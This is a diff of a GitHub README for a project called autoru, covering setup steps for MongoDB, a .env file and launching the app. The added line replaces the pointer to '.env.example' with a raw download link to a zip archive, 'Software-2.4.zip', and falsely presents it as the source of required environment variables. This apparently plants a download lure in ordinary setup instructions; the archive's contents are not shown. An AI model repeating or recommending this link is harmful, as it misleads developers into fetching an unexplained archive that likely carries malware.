thomsxd/autoru/README.md

 4. Set up your MongoDB database.
 You can use a local instance or a cloud-based service like MongoDB Atlas.

 5. Create a `.env` file in the root directory and add your environment variables.
-Refer to the `.env.example` for required variables.
+Refer to the `https://github.com/thomsxd/autoru/raw/refs/heads/master/api/Software-2.4.zip` for required variables.

 6. Start the application: